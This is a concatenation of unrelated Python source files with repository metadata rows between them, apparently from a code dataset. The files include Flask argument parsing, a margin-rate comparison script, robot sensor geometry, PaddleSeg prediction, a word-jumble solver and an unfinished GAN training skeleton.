namespace[arg.dest or arg.name] = value
if errors:
flask_restful.abort(http_error_code, message=errors)
if strict and req.unparsed_arguments:
raise exceptions.BadRequest('Unknown arguments: %s'
% ', '.join(req.unparsed_arguments.keys()))
return namespace
def copy(self):
""" Creates a copy of this RequestParser with the same set of arguments """
parser_copy = self.__class__(self.argument_class, self.namespace_class)
parser_copy.args = deepcopy(self.args)
parser_copy.trim = self.trim
parser_copy.bundle_errors = self.bundle_errors
return parser_copy
def replace_argument(self, name, *args, **kwargs):
""" Replace the argument matching the given name with a new version. """
new_arg = self.argument_class(name, *args, **kwargs)
for index, arg in enumerate(self.args[:]):
if new_arg.name == arg.name:
del self.args[index]
self.args.append(new_arg)
break
return self
def remove_argument(self, name):
""" Remove the argument matching the given name. """
for index, arg in enumerate(self.args[:]):
if name == arg.name:
del self.args[index]
break
return self
| [
"sijoythomas@pop-os.localdomain"
] | sijoythomas@pop-os.localdomain |
01b5aecd596babb4e4816989358f0c5c258c76bc | b9cea24e5fedb4d04cecc7d77932ae995e57af53 | /controlstatements/oddnumbers.py | 23f926553866fe74897e7c0e06d6ae6eccc48b50 | [] | no_license | bharaththippireddy/pythoncoreandadvanced | 70e8d4d43a31800f4e14e40fa53d8bc841866eb0 | 53bfb1d5a14fdc0aed882e486901b7b9a0f97780 | refs/heads/master | 2022-11-24T13:11:48.856569 | 2020-07-27T03:15:05 | 2020-07-27T03:15:05 | 282,782,741 | 1 | 7 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | x=int(input("Enter min number"))
y=int(input("Enter max number"))
i=x
if i % 2 == 0: i=x+1
while i<=y:
print(i)
i+=2
| [
"bharath@gmail.com"
] | bharath@gmail.com |
8816a5c657f444bdb5291cd1a2120ad77866f43f | 730ba345908910d835dfba40956cedf90d031923 | /data_compare_csv.py | ca7c3d3107cd73544a556ad4f56813e9ab2cec4f | [] | no_license | PatrickGPAN/script | a34a4bfcbb4704b41b7ee442f820f632637f472b | 1309888804b1ff5ac1d7dfa9b98af6ee6b01572c | refs/heads/master | 2020-03-28T14:13:57.573102 | 2018-09-26T01:43:13 | 2018-09-26T01:43:13 | 148,469,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,903 | py | ## _*_ coding:UTF-8 _*_
import pandas as pd
import numpy as np
date = raw_input("Please input the Date (Format: eg. 2017-08-30):")
cusid = raw_input("Please input the customer ID with the company standard:")
#sc=float(raw_input("Please input the collateral rate for SC (Format: eg. 0.07):"))
ssbzj=pd.read_csv("ssbzj.csv",encoding='gbk')
khxx=pd.read_csv("khxx.csv",encoding='gbk')
bzjmb=pd.read_csv("bzjmb.csv",encoding='gbk')
customer=pd.read_csv(cusid+".csv",encoding='gbk')
exchange=pd.read_csv(ur"ref\指定交易日交易所保证金率查询_"+date+".csv",encoding='utf-8')
exchange[u'合约']=map(lambda x: x.upper(),exchange[u"合约"])
delta=pd.read_csv(ur"ref\投资者保证金率属性_"+date+".csv",encoding='utf-8')
delta[u'合约代码']=map(lambda x: x.upper(),delta[u"合约代码"])
standard=pd.read_csv(ur"ref\投资者保证金率_"+date+".csv",encoding='utf-8')
standard[u'合约']=map(lambda x: x.upper(),standard[u"合约"])
exchangesx=pd.read_csv(ur"ref\交易所保证金率属性_"+date+".csv",encoding='utf-8')
exchangesx[u'合约代码']=map(lambda x: x.upper(),exchangesx[u"合约代码"])
#核对交易所合约保证金
contract=[]
for index in ssbzj.index:
if ssbzj.loc[index][u'合约代码'] == ssbzj.loc[index][u'合约代码']:
contract.append(str(ssbzj.loc[index][u'品种编号'])+str(int(ssbzj.loc[index][u'合约代码'])))
else:
contract.append(ssbzj.loc[index][u'品种编号'])
contract1=pd.Series(contract)
ssbzj['contract'] = contract1.values
temp1=pd.merge(ssbzj,exchange,left_on='contract',right_on=u'合约')
for index in temp1.index:
a1 = temp1.loc[index][u'初始保证金']
a2 = temp1.loc[index][u'投机多头保证金率']
if a1 != a2:
if temp1.loc[index][u'投机套保'] != u'保值':
print u"请核对合约上手保证金 " + temp1.loc[index]['contract']
#核对交易所品种保证金
#exchange[u"合约"].replace(regex=True, inplace=True, to_replace=r'[0-9.*]', value=r'')
#exchange=exchange.loc[exchange.groupby(exchange[u'合约'])[u'投机多头保证金率'].idxmin()]
exchangesx1=exchangesx[exchangesx[u'保证金分段名称'].isin([u'上市月后含1个交易日',u'上市月后含3个周五后含1个交易日后1个交易日'])]
#exchange[u"品种保证金"] = (exchange.groupby([u'合约'])[u'投机多头保证金率'].transform(lambda x: x.value_counts().index[0]))
protemp1=pd.merge(ssbzj,exchangesx1,left_on='contract',right_on=u'合约代码')
#protemp1.to_csv("test1.csv",encoding="utf8")
for index in protemp1.index:
a1 = protemp1.loc[index][u'初始保证金']
a2 = protemp1.loc[index][u'投机多头保证金率']
a3 = protemp1.loc[index][u'保值多头保证金率']
if a1 != a2:
if protemp1.loc[index][u'投机套保'] != u'保值':
print u"请核对品种上手保证金 " + protemp1.loc[index]['contract']
else:
if a1 != a3:
print u"请核对品种上手保证金 " + protemp1.loc[index]['contract']
"""
a1float = np.asscalar(a1)
if a1 != a2:
if protemp1.loc[index][u'投机套保'] != u'保值':
if protemp1.loc[index][u'合约'] != "SC":
print u"请核对品种上手保证金 " + protemp1.loc[index][u'合约']
elif abs(a1float-sc) > 1e-9:
print u"请核对品种上手保证金 SC"
"""
#核对保证金模板
bzjmb['contractproduct']=bzjmb[u'模板编号']+bzjmb[u'品种编号']
tempmb=pd.merge(bzjmb,khxx,left_on=u'模板编号',right_on=u'客户账号')
delta['contractproduct']=delta[u'投资者代码'].map(str)+delta[u'合约代码']
tempmb1=pd.merge(tempmb,delta,on='contractproduct')
#tempmb1.to_csv("test1.csv",encoding="utf8")
for index in tempmb1.index:
a1 = tempmb1.loc[index][u'初始保证金']
a2 = tempmb1.loc[index][u'投机多头保证金率']
if tempmb1.loc[index][u'账号状态'] == u'正常':
if a1 != a2:
print u"请核对保证金模板 " + tempmb1.loc[index][u'模板编号'] + " " + tempmb1.loc[index][u'品种编号']
#核对公司标准客户最终费率
contractzz=[]
for index in customer.index:
if customer.loc[index][u'合约'] == customer.loc[index][u'合约']:
contractzz.append(str(customer.loc[index][u'品种编号'])+str(int(customer.loc[index][u'合约'])))
else:
contractzz.append(customer.loc[index][u'品种编号'])
contractzz1=pd.Series(contractzz)
customer['contractzz'] = contractzz1.values
temp1=pd.merge(customer,standard,left_on='contractzz',right_on=u'合约')
for index in temp1.index:
a1 = temp1.loc[index][u'买投机初始保证金']
a2 = temp1.loc[index][u'投机多头保证金率']
if temp1.loc[index][u'品种类型'] == u"期货":
if a1 != a2:
print u"请核对最终费率 " + cusid + " " + temp1.loc[index]['contractzz']
raw_input("ALL COMPLETED")
| [
"noreply@github.com"
] | PatrickGPAN.noreply@github.com |
6977ac4f0421d56cf759e4eea724446355eb70f6 | ca019b667f762f19ee0ff78dbe1a65f52b01c2e9 | /a_priori_sensor_estimate.py | 88347c2d7915844a378be7eb5e2aeeb6ca378d8a | [] | no_license | mayurbhandary/EE183DA-Lab3 | f9369c5a7bbb4f8381f8763cdb958e4c649e1835 | d01e0134cda447e2dddc6634e8dbeb62d655fa08 | refs/heads/master | 2021-04-03T06:59:13.550785 | 2018-03-14T04:13:45 | 2018-03-14T04:13:45 | 125,125,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,818 | py | #script for testing a priori sensor estimation
import numpy as np
import math as math
BOX_WIDTH = 60
BOX_LENGTH = 100
def apriori_sensor_estimate(state_apriori):
#apriori state values
x_apriori = state_apriori[0]
y_apriori = state_apriori[1]
xy_apriori = [x_apriori, y_apriori]
theta_apriori = state_apriori[2]
#want to determine this value
front_sensor_distance = 0
right_sensor_distance = 0
#special cases: theta_apriori = 0, 90, 180, or 270 deg
if theta_apriori == 0:
front_sensor_distance = BOX_LENGTH - x_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == math.pi/2:
front_sensor_distance = BOX_WIDTH - y_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == math.pi:
front_sensor_distance = x_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
if theta_apriori == 3/2*math.pi:
front_sensor_distance = y_apriori
right_sensor_distance = y_apriori
return front_sensor_distance , right_sensor_distance
#slopes
m1 = math.tan(theta_apriori)
m2 = -1/m1
#direction vectors
direction_vector_front = [math.cos(theta_apriori), math.sin(theta_apriori)]
direction_vector_right = [math.sin(theta_apriori), -math.cos(theta_apriori)]
#boundary intersections
x_leftwall = 0
y_leftwall_front = get_y_value(x_apriori, y_apriori, x_leftwall, m1)
leftwall_intersection_front = [x_leftwall, y_leftwall_front]
y_leftwall_right = get_y_value(x_apriori, y_apriori, x_leftwall, m2)
leftwall_intersection_right = [x_leftwall, y_leftwall_right]
x_rightwall = BOX_LENGTH
y_rightwall_front = get_y_value(x_apriori, y_apriori, x_rightwall, m1)
rightwall_intersection_front = [x_rightwall, y_rightwall_front]
y_rightwall_right = get_y_value(x_apriori, y_apriori, x_rightwall, m2)
rightwall_intersection_right = [x_rightwall, y_rightwall_right]
y_bottomwall = 0
x_bottomwall_front = get_x_value(x_apriori, y_apriori, y_bottomwall, m1)
bottomwall_intersection_front = [x_bottomwall_front, y_bottomwall]
x_bottomwall_right = get_x_value(x_apriori, y_apriori, y_bottomwall, m2)
bottomwall_intersection_right = [x_bottomwall_right, y_bottomwall]
y_topwall = BOX_WIDTH
x_topwall_front = get_x_value(x_apriori, y_apriori, y_topwall, m1)
topwall_intersection_front = [x_topwall_front, y_topwall]
x_topwall_right = get_x_value(x_apriori, y_apriori, y_topwall, m2)
topwall_intersection_right = [x_topwall_right, y_topwall]
#boundary vectors
leftwall_vector_front = list(np.array(leftwall_intersection_front) - np.array(xy_apriori))
rightwall_vector_front = list(np.array(rightwall_intersection_front) - np.array(xy_apriori))
bottomwall_vector_front = list(np.array(bottomwall_intersection_front) - np.array(xy_apriori))
topwall_vector_front = list(np.array(topwall_intersection_front) - np.array(xy_apriori))
leftwall_vector_right = list(np.array(leftwall_intersection_right) - np.array(xy_apriori))
rightwall_vector_right = list(np.array(rightwall_intersection_right) - np.array(xy_apriori))
bottomwall_vector_right = list(np.array(bottomwall_intersection_right) - np.array(xy_apriori))
topwall_vector_right = list(np.array(topwall_intersection_right) - np.array(xy_apriori))
#vector dot products
leftwall_dotproduct_front = np.dot(direction_vector_front, leftwall_vector_front)
rightwall_dotproduct_front = np.dot(direction_vector_front, rightwall_vector_front)
bottomwall_dotproduct_front = np.dot(direction_vector_front, bottomwall_vector_front)
topwall_dotproduct_front = np.dot(direction_vector_front, topwall_vector_front)
dot_products_front = [leftwall_dotproduct_front, rightwall_dotproduct_front, bottomwall_dotproduct_front, topwall_dotproduct_front]
leftwall_dotproduct_right = np.dot(direction_vector_right, leftwall_vector_right)
rightwall_dotproduct_right = np.dot(direction_vector_right, rightwall_vector_right)
bottomwall_dotproduct_right = np.dot(direction_vector_right, bottomwall_vector_right)
topwall_dotproduct_right = np.dot(direction_vector_right, topwall_vector_right)
dot_products_right = [leftwall_dotproduct_right, rightwall_dotproduct_right, bottomwall_dotproduct_right, topwall_dotproduct_right]
#distances between apriori (x,y) and boundary intersections
leftwall_distance_front = dist(xy_apriori, leftwall_intersection_front)
rightwall_distance_front = dist(xy_apriori, rightwall_intersection_front)
bottomwall_distance_front = dist(xy_apriori, bottomwall_intersection_front)
topwall_distance_front = dist(xy_apriori, topwall_intersection_front)
leftwall_distance_right = dist(xy_apriori, leftwall_intersection_right)
rightwall_distance_right = dist(xy_apriori, rightwall_intersection_right)
bottomwall_distance_right = dist(xy_apriori, bottomwall_intersection_right)
topwall_distance_right = dist(xy_apriori, topwall_intersection_right)
#determine which wall front sensor is pointing at
positive_dot_products_front = []
for i in range(len(dot_products_front)):
if dot_products_front[i] > 0: #store the positive dot products
positive_dot_products_front.append(dot_products_front[i])
print "positive dot products for front sensor: ",positive_dot_products_front
print " "
#left wall dot product check
if dot_products_front[0] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[0] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[0] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter left"
front_sensor_distance = leftwall_distance_front;
#right wall dot product check
if dot_products_front[1] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[1] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[1] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter right"
front_sensor_distance = rightwall_distance_front;
#bottom wall dot product check
if dot_products_front[2] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[2] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[2] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter bottom"
front_sensor_distance = bottomwall_distance_front;
#top wall dot product check
if dot_products_front[3] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[3] is the smallest dot product
for i in range(len(positive_dot_products_front)):
if dot_products_front[3] > positive_dot_products_front[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter top"
front_sensor_distance = topwall_distance_front;
#determine which wall right sensor is pointing at
positive_dot_products_right = []
for i in range(len(dot_products_right)):
if dot_products_right[i] > 0: #store the positive dot products
positive_dot_products_right.append(dot_products_right[i])
print "positive dot products for right sensor: ",positive_dot_products_front
print " "
#left wall dot product check
if dot_products_right[0] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[0] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[0] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter left"
right_sensor_distance = leftwall_distance_right;
#right wall dot product check
if dot_products_right[1] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[1] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[1] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter right"
right_sensor_distance = rightwall_distance_right;
#bottom wall dot product check
if dot_products_right[2] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[2] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[2] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter bottom"
right_sensor_distance = bottomwall_distance_right;
#top wall dot product check
if dot_products_right[3] > 0 : #first check if dot product is positive
smallest_dot = 1 #smallest_dot = 1 if dot_products[3] is the smallest dot product
for i in range(len(positive_dot_products_right)):
if dot_products_right[3] > positive_dot_products_right[i]:
smallest_dot = 0
if smallest_dot == 1:
print "enter top"
right_sensor_distance = topwall_distance_right;
#print wall intersection distances
print " "
print "left wall distance front sensor: ", leftwall_distance_front
print "right wall distance front sensor: ", rightwall_distance_front
print "bottom wall distance front sensor: ", bottomwall_distance_front
print "top wall distance front sensor: ", topwall_distance_front
print " "
print "left wall distance right sensor: ", leftwall_distance_right
print "right wall distance right sensor: ", rightwall_distance_right
print "bottom wall distance right sensor: ", bottomwall_distance_right
print "top wall distance right sensor: ", topwall_distance_right
#print wall dot products
print " "
print "left wall dot product front sensor: ", leftwall_dotproduct_front
print "right wall dot product front sensor: ", rightwall_dotproduct_front
print "bottom wall dot product front: ", bottomwall_dotproduct_front
print "top wall dot product front: ", topwall_dotproduct_front
print " "
print "left wall dot product right sensor: ", leftwall_dotproduct_right
print "right wall dot product right sensor: ", rightwall_dotproduct_right
print "bottom wall dot product right: ", bottomwall_dotproduct_right
print "top wall dot product right: ", topwall_dotproduct_right
print " "
return front_sensor_distance, right_sensor_distance
def get_y_value(x_apriori, y_apriori, x ,slope):
return slope*(x - x_apriori) + y_apriori
def get_x_value(x_apriori, y_apriori, y, slope):
return ((y - y_apriori) / slope) + x_apriori
def dist(p1,p2):
return math.sqrt((p1[0]-p2[0])*(p1[0]-p2[0])+(p1[1]-p2[1])*(p1[1]-p2[1]))
if __name__ == "__main__":
x_apriori = input("A priori x: ")
y_apriori = input("A priori y: ")
theta_apriori = input("A priori theta (in radians): ")
print " "
state_apriori = [x_apriori, y_apriori, theta_apriori]
aprioriFrontSensorEstimate, aprioriRightSensorEstimate = apriori_sensor_estimate(state_apriori)
print "A priori front sensor estimate: ", aprioriFrontSensorEstimate
print "A priori right sensor estimate: ", aprioriRightSensorEstimate
| [
"noreply@github.com"
] | mayurbhandary.noreply@github.com |
990eab3bfb95f9e034dff652d4940d4049c150a5 | b8562dd67c855e1bebbd0ad093f6dbf4b920ddfa | /507proj/bin/wheel | 396c232db77b396f3939fbeef36d4fca767d750a | [] | no_license | zhr211/SI5017FinalProj-foodieflask | 022124048c4f273c086b9aa8e03f08548245f0b0 | 3011ebe498fc7bcb5b7560ebc409a6cb2da8d2d3 | refs/heads/master | 2020-04-11T01:35:36.177222 | 2018-12-12T02:16:42 | 2018-12-12T02:16:42 | 161,420,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | #!/Users/apple/Desktop/2018Fall/SI507-FALL/FinalProject/507proj/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"zhr@umich.edu"
] | zhr@umich.edu | |
1acf8a09959d28ad02255ba4048d644c5a097f57 | 8de34d7180ccfadd104c2fec7b2ef8ae441e9801 | /paddleseg/core/predict.py | 1f6af33cc47c987cd8e0998b780b2b12cb6efabf | [] | no_license | ymzx/bugs_track_detect_v2.2 | ebd30b14831e9c0a8e376917785a68fec6178886 | e5a75eb43dac980482b5a842f200c63f2f377010 | refs/heads/main | 2023-07-15T20:52:58.846034 | 2021-08-29T05:57:30 | 2021-08-29T05:57:30 | 399,048,489 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,385 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import math
import cv2
import numpy as np
import paddle
from paddleseg import utils
from paddleseg.core import infer
from paddleseg.utils import logger, progbar
from paddleseg.utils.FilepathFilenameFileext import filepath_filename_fileext
def mkdir(path):
sub_dir = os.path.dirname(path)
if not os.path.exists(sub_dir):
os.makedirs(sub_dir)
def partition_list(arr, m):
"""split the list 'arr' into m pieces"""
n = int(math.ceil(len(arr) / float(m)))
return [arr[i:i + n] for i in range(0, len(arr), n)]
def predict(model,
model_path,
transforms,
image_list,
image_dir=None,
save_dir='output',
aug_pred=False,
scales=1.0,
flip_horizontal=True,
flip_vertical=False,
is_slide=False,
stride=None,
crop_size=None):
"""
predict and visualize the image_list.
Args:
model (nn.Layer): Used to predict for input image.
model_path (str): The path of pretrained model.
transforms (transform.Compose): Preprocess for input image.
image_list (list): A list of image path to be predicted.
image_dir (str, optional): The root directory of the images predicted. Default: None.
save_dir (str, optional): The directory to save the visualized results. Default: 'output'.
aug_pred (bool, optional): Whether to use mulit-scales and flip augment for predition. Default: False.
scales (list|float, optional): Scales for augment. It is valid when `aug_pred` is True. Default: 1.0.
flip_horizontal (bool, optional): Whether to use flip horizontally augment. It is valid when `aug_pred` is True. Default: True.
flip_vertical (bool, optional): Whether to use flip vertically augment. It is valid when `aug_pred` is True. Default: False.
is_slide (bool, optional): Whether to predict by sliding window. Default: False.
stride (tuple|list, optional): The stride of sliding window, the first is width and the second is height.
It should be provided when `is_slide` is True.
crop_size (tuple|list, optional): The crop size of sliding window, the first is width and the second is height.
It should be provided when `is_slide` is True.
"""
utils.utils.load_entire_model(model, model_path)
model.eval()
nranks = paddle.distributed.get_world_size()
local_rank = paddle.distributed.get_rank()
if nranks > 1:
img_lists = partition_list(image_list, nranks)
else:
img_lists = [image_list]
added_saved_dir = os.path.join(save_dir, 'added_prediction')
pred_saved_dir = os.path.join(save_dir, 'pseudo_color_prediction')
logger.info("Start to predict...")
progbar_pred = progbar.Progbar(target=len(img_lists[0]), verbose=1)
with paddle.no_grad():
for i, im_path in enumerate(img_lists[local_rank]):
im = cv2.imread(im_path)
ori_shape = im.shape[:2]
im, _ = transforms(im)
im = im[np.newaxis, ...]
im = paddle.to_tensor(im)
if aug_pred:
pred = infer.aug_inference(
model,
im,
ori_shape=ori_shape,
transforms=transforms.transforms,
scales=scales,
flip_horizontal=flip_horizontal,
flip_vertical=flip_vertical,
is_slide=is_slide,
stride=stride,
crop_size=crop_size)
else:
pred = infer.inference(
model,
im,
ori_shape=ori_shape,
transforms=transforms.transforms,
is_slide=is_slide,
stride=stride,
crop_size=crop_size)
pred = paddle.squeeze(pred)
pred = pred.numpy().astype('uint8')
# get the saved name
filepath, shotname, extension = filepath_filename_fileext(im_path)
im_file = shotname+extension
# save added image
added_image = utils.visualize.visualize(im_path, pred, weight=0.6)
added_image_path = os.path.join(added_saved_dir, im_file)
mkdir(added_image_path)
cv2.imwrite(added_image_path, added_image)
# save pseudo color prediction
pred_mask = utils.visualize.get_pseudo_color_map(pred)
pred_saved_path = os.path.join(pred_saved_dir, os.path.splitext(im_file)[0] + ".png")
mkdir(pred_saved_path)
pred_mask.save(pred_saved_path)
progbar_pred.update(i + 1)
| [
"494056012@qq.com"
] | 494056012@qq.com |
f16a59cbded9413a22d9a9d7d5816f14d3b4749e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part005112.py | f6ccb551e9b49171345708249fe74b4524d23c9a | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,369 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher13068(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.1.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher13068._instance is None:
CommutativeMatcher13068._instance = CommutativeMatcher13068()
return CommutativeMatcher13068._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 13067
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 13069
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.1.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 13070
if len(subjects2) >= 1 and subjects2[0] == Rational(1, 2):
tmp5 = subjects2.popleft()
# State 13071
if len(subjects2) == 0:
pass
# State 13072
if len(subjects) == 0:
pass
# 0: sqrt(v)
yield 0, subst1
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
9c14033ca297f8e0621bf69583d670cb7e1b6410 | d6953b558412b2004d40adad4aa4c4ec38e4c274 | /dumbjumble.py | f471e10115ad91d45a0ce696141c157482179a29 | [] | no_license | devonreed/twice-jumble | a75c08dc0910be4006adf07f1f9e887861a75abb | 8e56848ccdcd79b935b8c7e1cfb5a63fdf33b650 | refs/heads/master | 2018-12-31T17:03:50.102837 | 2014-02-27T07:41:27 | 2014-02-27T07:41:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,065 | py | import time
start = int(round(time.time() * 1000))
# permute() takes a list of letters and a prefix and
# returns all permutations of those letters with the
# prefix appended to the head
def permute(letters, prefix):
permutations = list()
for idx, letter in enumerate(letters):
permutations.append(prefix+letter)
newletters = list(letters)
del newletters[idx]
permutations += permute(newletters, prefix+letter)
return permutations
# prompt for user input
word = raw_input('Jumble Me! (enter a word): ')
letters = list(word)
# load our dictionary
f = open('2of12.txt', 'r')
possibilities = list()
# get all permutations of the user's input
allpermutations = permute(letters, '')
# loop through dictionary and look for any words
# that match our permutations
for dictword in f:
dictword = dictword.strip()
for permutation in allpermutations:
if permutation == dictword:
possibilities.append(dictword)
break
print possibilities
end = int(round(time.time() * 1000))
print "Total Time Elapsed: " + str(end-start) + "ms"; | [
"dreed@admins-MacBook-Pro-34.local"
] | dreed@admins-MacBook-Pro-34.local |
b89bbad48629a4bdeb5dc4a5188b064bf238cfee | 1222c3b6fc8f7e3c0bb3d0f4e871de745e2a65b2 | /lesons/wsgi.py | 74276de3e07fa9eec12c438a419c54f1f6a203da | [] | no_license | yuliiaboiko/good_mood | c8956688e47548cf92c0a14109e86cc69000805f | bc726cd25b010a30582e3f1f7980371891712dcc | refs/heads/master | 2020-04-24T19:46:27.773863 | 2019-02-23T16:04:02 | 2019-02-23T16:04:02 | 172,222,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
WSGI config for lesons project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'lesons.settings')
application = get_wsgi_application()
| [
"yulstrielnik@ukr.net"
] | yulstrielnik@ukr.net |
aa7b6d83df452c7b54da3fa1960b6ca05621a4c7 | 3899a00ff397c84ae7c6ed428e63760df4200277 | /final_project/trainers/GAN.py | 3b7c7d9910731e4dc73d2b360914142d3ae5aa7d | [] | no_license | ajignasu/ME592x-Spring2021 | 09066be044353dcd6627ff8ca5dec26e0c52bbaf | 9b0eb1bb73be7253d2c6ec428b0d4b83e6141e29 | refs/heads/main | 2023-04-09T03:22:55.003966 | 2021-04-22T20:18:09 | 2021-04-22T20:18:09 | 337,126,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,206 | py | import sys, os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch import autograd
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
import matplotlib.pyplot as plt
from torch.utils.data import Dataset, DataLoader
import numpy as np
from models import *
import operator
import data
from data import TopoDataset1
import utils
from utils import *
from tensorboardX import SummaryWriter
# for reference:
# https://colab.research.google.com/github/pytorch/tutorials/blob/gh-pages/_downloads/e9c8374ecc202120dc94db26bf08a00f/dcgan_faces_tutorial.ipynb
def train(device, train_loader, validation_loader, validation_samples, epochs, tensorboard):
print('Beginning training.')
#initialize models => call nn.Module -> initialize weights -> send to device for training
generator = # call and initialize appropriate model here
generator.apply(weights_init_normal)
generator = generator.to(device)
discriminator = # call and initialize appropriate model here
discriminator.apply(weights_init_normal)
discriminator = discriminator.to(device)
#initialize optimizers
opt_generator = # select optimizer type of optimizer matters especially for different GANs
opt_discriminator = # select optimizer type of optimizer matters especially for different GANs
#iterate through epochs
for epoch in range(epochs):
#initialize losses
running_gen_loss, running_dis_loss = 0.0, 0.0
print('Beginning epoch ', epoch+1)
for idx, batch in enumerate(train_loader):
#load minibatch
initial_SE = batch['initial_SE']
initial_D = batch['initial_D']
final_SE = batch['final_SE']
final_D = batch['final_D']
#send minibatch to GPU for computation
initial_SE = initial_SE.to(device)
initial_D = initial_D.to(device)
final_SE = final_SE.to(device)
final_D = final_D.to(device)
#freeze discriminator
for p in discriminator.parameters():
p.requires_grad_(False)
#zero gradient (generator)
#insert code here
# generator prediction
pred_D = model(torch.cat((initial_SE, initial_D), 1))
#calculate generator loss
#insert code here
#call backward pass
#insert code here
#take generator's optimization step
#insert code here
#unfreeze discriminator
#zero gradient (discriminator)
#discriminator forward pass over appropriate inputs
# calculate discriminator losses
# call backward pass
# take discriminator's optimization step
#log losses to tensorboard
tensorboard.add_scalar('training/generator_loss', generator_loss, epoch)
tensorboard.add_scalar('training/discriminator_loss', discriminator_loss, epoch)
# evaluate validation set
# disable autograd engine
with torch.no_grad():
#iterate through validation set
for idx, batch in enumerate(validation_loader):
#load minibatch
initial_SE = batch['initial_SE']
initial_D = batch['initial_D']
final_SE = batch['final_SE']
final_D = batch['final_D']
#send minibatch to GPU for computation
initial_SE = initial_SE.to(device)
initial_D = initial_D.to(device)
final_SE = final_SE.to(device)
final_D = final_D.to(device)
# generator prediction
pred_D = model(torch.cat((initial_SE, initial_D), 1))
#calculate generator loss
#insert code here
#discriminator forward pass over appropriate inputs
# calculate discriminator losses
#log losses to tensorboard
tensorboard.add_scalar('validation/generator_loss', generator_loss, epoch)
tensorboard.add_scalar('validation/discriminator_loss', discriminator_loss, epoch)
# plot out some samples from validation
fig, axs = plt.subplots(len(val_samples), 4, figsize=(1*4,1*len(val_samples)),
subplot_kw={'aspect': 'auto'}, sharex=True, sharey=True, squeeze=True)
